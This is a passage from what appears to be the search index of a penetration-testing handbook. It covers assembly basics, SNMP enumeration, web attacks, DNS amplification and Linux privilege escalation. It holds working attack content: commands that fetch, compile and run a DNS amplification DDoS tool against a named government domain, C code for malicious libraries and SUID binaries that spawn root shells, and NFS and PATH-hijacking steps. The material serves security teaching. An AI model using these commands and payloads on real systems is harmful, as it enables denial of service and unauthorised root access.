opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"319","title":"Seeking"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. -c: Change the community string to use. Default is public -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"320","title":"Introduction"},"321":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"321","title":"Introduction"},"322":{"body":"Variables in assembly do not exists in the same sense as they do in higher-level programming languages. This is especially true of local variabls such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that variable names are more or less identical to addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"322","title":"Introduction"},"323":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"323","title":"Constants"},"324":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"324","title":"Static Initialised Data"},"325":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is following: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"325","title":"Static Uninitialised Data"},"326":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"326","title":"Introduction"},"327":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 28 [0..255] [−128..+127] Word (16 bits) 216 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 232 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 264 [0..264−1] [−263..+263−1] Double Quadword (128 bits) 2128 [0..2128−1] [−2127..+2127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"327","title":"Integer Representation"},"328":{"body":"Signed integers are represented using two's complement. In order to convert a acquire the negative form of a number in two's complement, is two negate all of its bits and add 1 to the number. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"328","title":"Two's Complement"},"329":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. It's syntax is mostly the same as snmp-check:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmpwalk","id":"33","title":"SNMP Enumeration using snmpwalk"},"330":{"body":"In register mode addressing, the operand is a register ( brain undergoing nuclear-fission ). mov rax, rbx The value inside rbx is copied to rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Register Mode Addressing","id":"330","title":"Register Mode Addressing"},"331":{"body":"In immediate mode addressing, the operand is an immediate value, or a literal . These are simply constant values such as 10, 0xfa3, \"lol\", and so on. mov rax, 123 The number 123 is copied into rax.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Immediate Mode Addressing","id":"331","title":"Immediate Mode Addressing"},"332":{"body":"In memory mode addressing, the operand is treated as a memory location. This is referred to as indirection or dereferencing and is similar to how pointers can be dereferenced in C/C++. In assembly, this is done by wrapping the operand in square brackets: []. So for example, rax refers to the value stored within the register rax. However, [rax] means \"treat rax like a pointer and use the value it points to\". Essentially, [rax] treats the value inside the register as an address and uses that address to find the actual value it needs. mov DWORD PTR [rax], 0xdeadbeef The value 0xdeadbeef is copied into the location pointed to by rax. Since memory is byte-addressable, it is oftentimes required to specify how many bytes we want to access. This is done by prepending one of the following specifiers to the operand: Specifier Number of Bytes BYTE PTR / byte 1 WORD PTR / word 2 DWORD PTR / dword 4 QWORD PTR / qword 8 Moreover, the actual formula for memory addressing is a bit more complicated, since it was developed mainly for making the implementation of arrays easier. [baseAddr + (indexReg * scaleValue) + offset] The baseAddr must be a register or variable name, although it may be omitted in which case the address is relative to the beginning of the data segment. indexReg is a register which specifies contains an index into the array and the scaleValue is the size (in bytes) of a single member of the array. The offset must be an immediate value. mov eax, dword [ebx] ; move into eax the value which ebx points to\nmov rax, QWORD PTR [rbx + rsi] ; move into rax the value which (rbx + rsi) points to\nmov rcx, qword [rax+(rsi*8)] ; move into rcx the value which (rax + (rsi*8)) points to","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Memory Mode Addressing","id":"332","title":"Memory Mode Addressing"},"333":{"body":"Memory is nothing more than a series of bytes which can be individually addressed. When storing values which are larger than a single byte, the bytes under the x86-64 paradigms are stored in little-endian order - the least significant byte (LSB) at the lowest memory address and the most significant byte (MSB) at the highest memory address. For example, the variable var = 0xDEADBEEF would be represented in memory as follows: Note how the right-most byte is at a lower address and the addresses for the rest of the bytes increase as we go right-to-left.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Endianness","id":"333","title":"Endianness"},"334":{"body":"Below is the general memory layout of a programme: The reserved section is unavailable to user programmes. The .text sections stores the instructions which comprise the programme's code. Static variables which were declared and given a value at assemble-time are stored in the .data section. The .bss section stores static uninitialised data, i.e variables which were declared but were not provided with an initial value. If such variables are used before they are initialised, their value will be meaningless. The Stack and the Heap are where data can be allocated at run-time. The Stack is used for allocating space for small amounts of data with a size known at compile-time and grows from higher to lower addresses. Conversely, the Heap allows for the dynamic allocation of space for data of size known at run-time and grows from lower to higher addresses.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Memory » Memory Layout","id":"334","title":"Memory Layout"},"335":{"body":"Registers are value containers which reside on the CPU (separately from RAM). They are small in size and some have special purposes. x86-64 assembly operates with 16 general-purpose registers (GPRs). It should be noted that the 8-byte (r) variants do not exist in 32-bit mode. 64-bit Register Lower 4 Bytes Lower 2 Bytes Lower 1 Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. Note, the lower 16 bits of the rip register (instruction pointer) are inaccessible on their own. For example, the rax register could be set to the following: rax = 0x0000 000AB 10CA 07F0 The name eax would then only refer to the part of the rax register which contains 10CA 07F0. Similarly, ax would represent 07F0, and al would be just F0. Additionally, the upper byte of ax, bx, cx and dx may be separately accessed by means of the ah, bh, ch and dh monikers, which exist for legacy reasons.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Introduction","id":"335","title":"Introduction"},"336":{"body":"Not all registers available in the x86-64 paradigm are created equal. Certain registers are reserved for specific purposes, despite being called general-purpose.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Register Specialisation","id":"336","title":"Register Specialisation"},"337":{"body":"The stack pointer rsp (esp for 32-bit machines) is used to point to the current top of the stack and should not be used for any other purpose other than in instructions which involve stack manipulation.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Stack Pointer rsp","id":"337","title":"The Stack Pointer rsp"},"338":{"body":"The base pointer rbp (ebp for 32-bit machines) is the twin brother of the stack pointer and is used as a base pointer when calling functions. It points to the beginning of the current function's stack frame. Interestingly enough, its use is actually gratuitous because compilers can manage the stack frames of functions equally well without a separate base pointer. It is mostly used to make assembly code more comprehensible for humans.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Base Pointer rbp","id":"338","title":"The Base Pointer rbp"},"339":{"body":"The instruction pointer rip (eip for 32-bit machines) points to the next instruction to be executed. It is paramount not to get confused when using a debugger, since the rip does not actually point to the instruction currently being executed.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Instruction Pointer rip","id":"339","title":"The Instruction Pointer rip"},"34":{"body":"Notwithstanding its age, onesixtyone is a good tool which allows you to bruteforce community strings by specifying a file instead of a single string with its -c option. It's syntax is rather simple:","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Bruteforce community strings with onesixtyone","id":"34","title":"Bruteforce community strings with onesixtyone"},"340":{"body":"The flag register rFlags (eFlags for 32-bit machines) is an isolated register which is automatically updated by the CPU after every instruction and is not directly accessible by programmes. Following is a table of the meaning assigned to different bits of this register. Note that only the lower 32 bits are used even on 64-bit machines. Name Symbol Bit Usage =1 =0 Carry CF 0 Indicates whether the previous operation resulted in a carry-over. CY (Carry) CN (No Carry) 1 Reserved. Always set to 1 for eFlags. Parity PF 2 Indicates whether the least significant byte of the previous instruction's result has an even number of 1's. PE (Parity Even) PO (Parity Odd) 3 Reserved. Auxiliary Carry AF 4 Used to support binary-coded decimal operations. AC (Auxiliary Carry) NA (No Auxiliary Carry) 5 Reserved. Zero ZF 6 Indicates whether the previous operation resulted in a zero. ZR (Zero) NZ (Not Zero) Sign SF 7 Indicates whether the most significant bit was set to 1 in the previous operation (implies a negative result in signed-data contexts). NG (Negative) PL (Positive) Trap TF 8 Used by debuggers when single-stepping through a programme. Interrupt Enable IF 9 Indicates whether or not the CPU should immediately respond to maskable hardware interrupts. EI (Enable Interrupt) DI (Disable Interrupt) Direction DF 10 Indicates the direction in which several bytes of data should be copied from one location to another. DN (Down) UP (Up) Overflow OF 11 Indicates whether the previous operation resulted in an integer overflow. OV (Overflow) NV (No Overflow) I/O Privilege Level IOPL 12-13 Nested Task NT 14 Mode MD 15 Resume RF 16 Virtual 8086 Mode VM 17 31-63 Reserved.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » The Flag Register rFlags","id":"340","title":"The Flag Register rFlags"},"341":{"body":"In addition to the aforementioned registers, the x86-64 paradigm includes 16 registers, xmm[0-15], which are used for 32- and 64-bit floating-point operations. Furthermore, the same registers are used to support the Streaming SIMD Extensions (SSE) which allow for the execution of Single Instruction Multiple Data (SIMD) instructions.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Registers » Floating-Point Registers and SSE","id":"341","title":"Floating-Point Registers and SSE"},"342":{"body":"The x86-64 assembly paradigm has quite a lot of different instructions available at its disposal. An instructions consists of an operation and a set of operands where the latter specify the data and the former specifies what is to be done to that data.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Instruction Set » Introduction","id":"342","title":"Introduction"},"343":{"body":"Typically, instruction signatures are represented using the following operand notation. Operand Notation Description Register operand. , , , Register operand with a specific size requirement. Source operand. Destination operand - this may be a register or memory location. Floating-point destination register operand. Immediate value (a literal). Base-10 by default, but can be preceded with 0x to make it hexadecimal. Memory location - a variable name or an address. Arbitrary operand - immediate value, register or memory location. .'\">View Me! Here, a new URL is generated based on the value of a parameter $val. Here, the attacker passes the value 123%26action=edit onto the parameter. The URL-encoded value for & is %26. When this gets to the htmlspecialchars function, the %26 gets converted to an &. When the URL gets formed, it becomes And since this is view as HTML, an additional parameter has been smuggled! The link would be equivalent to /page.php? action=view&par=123&action=edit This second action parameter could cause unexpected behaviour based on how the server handles duplicate requests.","breadcrumbs":"Exploitation » Web » HTTP Parameter Pollution » Client-Side HPP","id":"147","title":"Client-Side HPP"},"148":{"body":"The HTTP Host header is a mandatory header for HTTP requests and specifies the domain name which the client wants to access. This is especially handy with virtual hosting because a single IP address may provide different services on different domains and the server needs to know which page to return to the client. For example, the same machine may serve a blog website at blog.example.com and a git repository at dev.example.com. In order to specify which of the two services the client wants to access, they must specify either the header Host: blog.example.com or dev.example.com, respectively, in their request. A host header injection vulnerability arises when the target application unsafely uses the contents of the Host header, typically in order to construct an absolute URL.","breadcrumbs":"Exploitation » Web » Host Header Injection » Introduction","id":"148","title":"Introduction"},"149":{"body":"This technique involves using Host Header Injection in order to force a vulnerable application to generate a password reset link which points to a malicious domain. This may be leveraged to steal the secret tokens required to reset the passwords of arbitrary users and consequently compromise their accounts. Typically applications implement password resetting as follows. The user specifies their username/email. The server generates a temporary, unique, high-entropy token for the user. The server generates a URL for the password reset with the secret token included as a URL parameter. For example, example.com/reset?token=abcdefghijklmnopqrstuvwxyz The server sends an email to the client which includes the generated password reset link. When the user clicks the link in their email, the token in the URL is used by server in order to determine whose password is being reset and whether or not it is a valid request. If the Host header of the request for a password reset is used in generating the password reset URL, an adversary may leverage it in order to steal the token for an arbitrary user. For example, an adversary could submit a password reset request for a user, e.g. carlos, intercept the request and modify the Host header to point to a domain controlled by them: Host: exploit-server.com. When the server generates the password reset URL, it will resemble the following, http://exploit-server.com/reset?token=abcdefghijklmnopqrstuvwxyz. If the victim clicks on the link, their token will be handed over to the attacker by means of the exploit-server.com domain which receives the password reset request. This type of attack, however, does not always require user interaction because emails are typically scanned be it to determine if they are spam or if they contain a virus and the scanners will oftentimes open the links themselves, all automatically, thus giving the attacker the token to reset the password.","breadcrumbs":"Exploitation » Web » Host Header Injection » Password Reset Poisoning","id":"149","title":"Password Reset Poisoning"},"15":{"body":"This is the process of discovering active hosts on a network, either for attacking them or assessing the overall network security.","breadcrumbs":"Reconnaissance » Enumeration » Network Scanning","id":"15","title":"Network Scanning"},"150":{"body":"Check to see if absolute URLs are necessary and cannot be replaced with relative ones. If an absolute URL is necessary, ensure that the current domain is stored in a configuration file and do NOT use the one from the Host: header. If using the Host header is inevitable, ensure that it is validated against a whitelist of permitted domains. Different frameworks may provide different methods for achieving this. Drop support for additional headers which may permit such attacks, such as the X-Forward-Host header. Do NOT virtual-host internal-only websites on a server which also provides public-facing content, since those may be accessed via manipulation of the Host header.","breadcrumbs":"Exploitation » Web » Host Header Injection » Prevention","id":"150","title":"Prevention"},"151":{"body":"","breadcrumbs":"Exploitation » Windows » Windows","id":"151","title":"Windows"},"152":{"body":"Shell Command Files (SCF) permit a limited set of operations and are executed upon browsing to the location where they are stored. What makes them interesting is the fact that they can communicate through SMB, which means that it is possible to extract NTLM hashes from Windows hosts. This can be achieved if you are provided with write access to an SMB share.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » Introduction","id":"152","title":"Introduction"},"153":{"body":"You will first need to create a malicious .scf file where you are going to write a simple (you can scarcely even call it that) script.","breadcrumbs":"Exploitation » Windows » SCF File Attacks » The Attack","id":"153","title":"The Attack"},"154":{"body":"","breadcrumbs":"Exploitation » DNS » DNS","id":"154","title":"DNS"},"155":{"body":"A DNS (Traffic) Amplificaton attack is a popular form of a distributed denial of service (DDoS) attack, which abuses open DNS resolvers to flood a target system with DNS response traffic. It's called an amplification attack because it uses DNS responses to upscale the size of the data sent to the victim.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » What is DNS Traffic Amplification?","id":"155","title":"What is DNS Traffic Amplification?"},"156":{"body":"An attacker sends a DNS name lookup to an open resolver with the source IP spoofed to be the victim's IP address. That way, any response traffic would be sent to the victim and not the attacker. The requests submitted by the attacker usually aim to query for as much information as possible in order to maximise the amplification effect. In most cases, the queries sent are of type ANY which requests all known information about a particular DNS zone. Using a botnet, it's easy to create immense amounts of traffic. It is also rather difficult to protect against these attacks because the traffic is coming from legitimate sources - real DNS servers.","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » How does it work?","id":"156","title":"How does it work?"},"157":{"body":"","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Conducting a DNS Traffic Amplification Attack","id":"157","title":"Conducting a DNS Traffic Amplification Attack"},"158":{"body":"We should first check if a DNS Traffic Amplification is possible and if it's viable. We can do this through Metasploit using the module auxiliary/scanner/dns/dns_amp. In the RHOSTS you need to put the IP of the name server you want to test. This module will tell you if a name server can be used in an amplification attack but won't actually execute the attack. Run the scanner:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Testing a DNS server for attack surface","id":"158","title":"Testing a DNS server for attack surface"},"159":{"body":"A simple tool is available only as a proof of concept here . You will need to download and then compile it: wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c gcc -o dnsdrdos dnsdrdos.c -Wall -ansi ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ wget https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\n--2021-09-21 13:01:11-- https://raw.githubusercontent.com/rodarima/lsi/master/entrega/p2/dnsdrdos.c\nResolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...\nConnecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 15109 (15K) [text/plain]\nSaving to: ‘dnsdrdos.c’ dnsdrdos.c 100%[========================================================================================================================================>] 14.75K --.-KB/s in 0.001s 2021-09-21 13:01:11 (17.9 MB/s) - ‘dnsdrdos.c’ saved [15109/15109] ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ gcc -o dnsdrdos dnsdrdos.c -Wall -ansi Now, create a file containing the IP's of each DNS server you want to use in the attack (only one IP per line). Use the following syntax to run the attack: sudo ./dnsdrdos -f -s -d -l ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ sudo ./dnsdrdos -f dns_servers -s 192.168.129.2 -d nsa.gov -l 30\n----------------------------------------------- dnsdrdos - by noptrix - http://www.noptrix.net/ ----------------------------------------------- ┌──(cr0mll@kali)-[~/MHN/DNS]-[]\n└─$ The output may be empty, but the packets were sent. You can verify this with wireshark:","breadcrumbs":"Exploitation » DNS » DNS Traffic Amplification » Executing the attack","id":"159","title":"Executing the attack"},"16":{"body":"Reveals the presence of known vulnerabilities. It checks whether a system is exploitable through a set of weaknesses. Such a scanner consists of a catalog and a scanning engine. The catalog contains information about known vulnerabilities and exploits for them that work on a multitude of servers. The scanning engine is responsible for the logic behind the exploitation and analysis of the results.","breadcrumbs":"Reconnaissance » Enumeration » Vulnerability Scanning","id":"16","title":"Vulnerability Scanning"},"160":{"body":"A flaw of all DNS name servers is that if they contain incorrect information, they may spread it to clients or other name servers. Each DNS name server (even individual clients) has a DNS cache. The system stores there information about any responses it gets for domains it requested. An attacker could inject false entries in this cache and as such, any computer which queries the poisoned name server will receive false results. This is known as DNS cache poisoning . The attack can be used to redirect users to a different website than the requested one. As such, it opens opportunities for phishing attacks by creating evil twins of login portals for well-known sites. A tool for performing such targeted attacks is deserter . Usage information is available on its GitHub page.","breadcrumbs":"Exploitation » DNS » DNS Cache Poisoning » Introduction","id":"160","title":"Introduction"},"161":{"body":"","breadcrumbs":"Post Exploitation » Post Exploitation","id":"161","title":"Post Exploitation"},"162":{"body":"","breadcrumbs":"Post Exploitation » Privilege Escalation » Introduction","id":"162","title":"Introduction"},"163":{"body":"The first thing you need to do after gaining a foothold on a machine is to look for reused credentials. You should try every password you have gathered on all users, you never know when you might find an easy escalation to root. Next, you should hunt down sensitive files and look for stored credentials in configuration and source files of different applications. Naturally, you should also enumerate any local databases you find. Additionally, SSH keys are something to be on the lookout for. You should also go through the bash history and look for any passwords which were passed as command-line arguments. You should then move on to looking for exploits. Kernel exploits are really low-hanging fruit, so you should always check the kernel version. Subsequently, proceed by enumerating sudo and the different ways to exploit it, for example via Shell Escape Sequences or LD_PRELOAD . Following, you should proceed by tracking down any misconfigurations such as excessive capabilities or SUID Binaries . You should check if you have write access to any sensitive files such as /etc/passwd or /etc/shadow, as well as any cron jobs or cron job dependencies. Ultimately, you should move on to enumerating running software and services which are executed as root and try to find vulnerabilities in them which may allow for privilege escalation. This can all be summed up into the following: Credentials Reused Credentials Credentials in Configuration or Source Files Credentials from Databases Credentials in Sensitive Files Credentials from Bash History SSH Keys Exploitation Kernel Exploits Sudo Misconfigurations Excessive Capabilities SUID/SGID Binaries Write Access to Sensitive Files Writable Cron Jobs and Cron Job Dependencies Installed Software Vulnerabilities in Software and Services Running as Root","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Methodology","id":"163","title":"Methodology"},"164":{"body":"The Set Owner User ID (SUID) and Set Group ID (SGID) are special permissions which can be attributed to Linux files and folders. Any files which are owned by root and have SUID set will be executed with elevated privileges. Our goal is to hunt down those files and abuse them in order to escalate our privileges. This can be easily done with the following command: find / -perm -u=s -type f -user root 2>/dev/null","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Introduction","id":"164","title":"Introduction"},"165":{"body":"You should diligently inspect the list of files returned. Some standard Linux binaries may allow for privilege escalation if they have the SUID bit set for one reason or another. It is useful to go through these binaries and check them on GTFOBins . In the above example, we find that /bin/systemctl has the SUID bit set and that it also has an entry in GTFOBins : By following the instructions, although with slight modifications, we can run commands with elevated privileges:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Exploiting Misconfigured Common Binaries","id":"165","title":"Exploiting Misconfigured Common Binaries"},"166":{"body":"Some binaries may be vulnerable to Shared Object (SO) Injection. This typically stems from misconfigurations where the binary looks for a specific library in a specific directory, but can't actually find it. If we have write access to this directory, we can hijack the search for the library by compiling our own malicious library in the place where the original one was supposed to be. This is quite similar to escalating via LD_PRELOAD , but it is a bit more difficult to find and exploit. You will first need to identify an SUID binary which has misconfigured shared libraries. A lot of the times the binary will refuse to run, saying that it is missing a particular library, however, this is not always the case: It is always good practice to run the programme with strace, which will print any attempts of the binary to access libraries: strace 2>&1 | grep -iE \"open|access\" What stands out in particular is the /home/user/.config/libcalc.so library, since /home/user/.config/ may be a writable directory. It turns out that the directory doesn't even exist, however, we can write to /home/user/ which means that we can create it. What now remains is to compile a malicious library into libcalc.so. #include \n#include static void inject() __attribute__((constructor)); void inject()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} For older versions of GCC, you may need to use the _init() function syntax: #include \n#include void _init()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\");\n} Compile the malicious library: gcc -shared -fPIC -o libcalc.so libcalc.c # add -nostartfiles if using _init()","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Shared Object Injection","id":"166","title":"Privilege Escalation via Shared Object Injection"},"167":{"body":"Path Hijacking refers to the deliberate manipulation of environmental variables, most commonly \\$PATH, such that the invocations of programmes in a binary actually refer to malicious binaries and not the intended ones. This vector requires more sophisticated digging into the internals of an SUID binary, specifically tracking down the different invocations the binary performs. This can commonly be achieved by running strings on the binary, but you will probably have to resort to more serious reverse engineering, as well. Specifically, you want to be on the lookout for shell commands which get executed by the SUID binary.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Privilege Escalation via Path Hijacking","id":"167","title":"Privilege Escalation via Path Hijacking"},"168":{"body":"Relative paths are comparably easy to hijack - they require little other than editing the \\$PATH variable. Once you have identified a shell command within an SUID binary which invokes another programme via a relative path, you can just prepend to the \\$PATH a directory which will contain an executable with the same name as the one originally invoked. Let's compile our own malicious binary. #include \n#include int main()\n{ setuid(0); setgid(0); system(\"/bin/bash -i\"); return 0;\n} gcc -o /tmp/service /tmp/service.c Afterwards, we need to prepend /tmp to the \\$PATH variable: export PATH=/tmp:\\$PATH And finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Relative Paths","id":"168","title":"Hijacking Relative Paths"},"169":{"body":"Absolute paths require a bit more work to be hijacked. Luckily, bash turns out to be very sophisticated and allows for the creation of functions which have the forward slash (/) character in their name. This means that we can create a malicious bash function with the same name as the absolute path we want to hijack and then our function will be invoked in lieu of the original programme. First, create the bash function: function () { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; } Next, export the function: export -f Finally, run the original SUID binary:","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Abusing SUID & SGID Binaries » Hijacking Absolute Paths","id":"169","title":"Hijacking Absolute Paths"},"17":{"body":"All services which need to somehow interface with the network a host is connected to run on ports and port scanning allows us to enumerate them in order to gather information such as what service is running, which version of the service is running, OS information, etc. Warning Port scanning is very heavy on network bandwidth and generates a lot of traffic which can cause the target to slow down or crash altogether. During a penetration test, you should always inform the client when you are about to perform a port scan. Danger Port scanning without prior written permission from the target may be considered illegal in some jurisdictions. The de-facto standard port scanner is nmap , although alternatives such as masscan and RustScan do exist. Info A lot of nmap's techniques require elevated privileges, so it is advisable to always run the tool with sudo.","breadcrumbs":"Reconnaissance » Enumeration » Port Scanning » Introduction","id":"17","title":"Introduction"},"170":{"body":"The kernel is the layer which sits between applications and the hardware. It runs with root privileges, so if it gets exploited, privileges can be escalated. Finding kernel vulnerabilities and writing exploits for them is no trifling task, however, once such a vulnerability is made public and exploit code for it is developed, it easily becomes a low-hanging fruit for escalating privileges. A very useful list of kernel exploits found to date is located here . Finding already existing exploits is really easy - just search for the Linux kernel version!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Introduction","id":"170","title":"Introduction"},"171":{"body":"As an example, we are going to exploit dirtyc0w. This was a very ubiquitous exploit and can still be found on numerous outdated machines. The exploit itself has many versions but for demonstration purposes we are going to use the one at https://www.exploit-db.com/exploits/40839 . We need to first verify that our kernel version is in the vulnerable range. Inside the exploit we see compilation instructions, which is typical of kernel exploits as they are usually written in C: By compiling and running the exploit (it may actually take some time to execute), we have elevated our privileges!","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Kernel Exploits » Exploiting the Kernel","id":"171","title":"Exploiting the Kernel"},"172":{"body":"It is common to see a low-privileged user to be configured to be able to run some commands via sudo without a password. Luckily, many existing programmes for Linux have advanced capabilities which allow them to do many things such as spawning a shell when run with sudo. If such a programme is configured in the aforementioned way, then there is a shell escape sequence which is a (usually) simple command/argument passed to the programme when run, so that it spawns a shell with elevated privileges when run with sudo. Naturally, these shell escape sequences are programme-specific and it would be inane to try and remember the sequence for every binary. This is where GTFOBins comes in. This is a database of commands (including shell escape sequences) for common Linux binaries which can be used for escalating privileges. We saw in the above list provided by sudo -l that we are allowed to run find as root via sudo. Let's check if there is a shell escape sequence for it. There is! We can copy and paste it, then run it with sudo, and we should at last have a root shell: Another example can be given with the awk binary, which we also saw in the list provided by sudo -l.","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » Sudo Shell Escape Sequences » Introduction","id":"172","title":"Introduction"},"173":{"body":"The compromised machine may be configured to allow certain directories to be mounted by other machines. You can enumerate such directories by running the following command on the victim machine: cat /etc/exports You can additionally verify this from your attacker machine by running: showmount -e If there is a mountable directory which is configured as no_root_squash, as is the case here, then it can be used for privilege escalation. We begin by mounting the target directory from the victim to a directory on our machine: sudo mount -o rw, vers=3 :/tmp /tmp/root_squash Now, if no_root_sqaush is configured for the mountable directory, then the root user on the attacker machine will get mirrored on the victim machine. In essence, any command run as root on the attacker machine, will also be executed as root on the victim! This can allow us to create a malicious binary in the mounted directory and set its SUID bit from the attacker machine. This action will be mirrored by the victim and we will essentially have an SUID binary on the target which is all under our control. Let's write a simple malicious C executable: #include \n#include int main()\n{ setuid(0); // Set user ID to root setgid(0); // Set group ID to root system(\"/bin/bash -i\"); // Execute bash now with elevated privileges return 0;\n} It doesn't matter if you create it on the target or the attacker machine, but you must compile it on the target machine in order to avoid library version mismatches: gcc -o nfs_exploit nfs_exploit.c Next, you want to change the ownership of the compiled binary to root on the attacker machine . Afterwards, you want to set the SUID bit on the binary, once again, from the attacker machine : sudo chown root:root nfs_exploit\nsudo chmod +s nfs_exploit Finally, execute the malicious binary on the target :","breadcrumbs":"Post Exploitation » Privilege Escalation » Linux » NFS Root Squashing » Introduction","id":"173","title":"Introduction"},"174":{"body":"Linux capabilities provide a way for splitting permissions into small units. A binary with particular capabilities can perform certain tasks with elevated privileges. If capabilities are not properly set, or if they are excessive, this may lead to privilege escalation. Binaries with capabilities may be found using the following command: getcap / -r 2>/dev/null A list of all possible capabilities can be found here . In the above example, we can see that the python interpreter can arbitrarily set the user ID of the process. This means that we can change our user ID to 0 when running python, thus 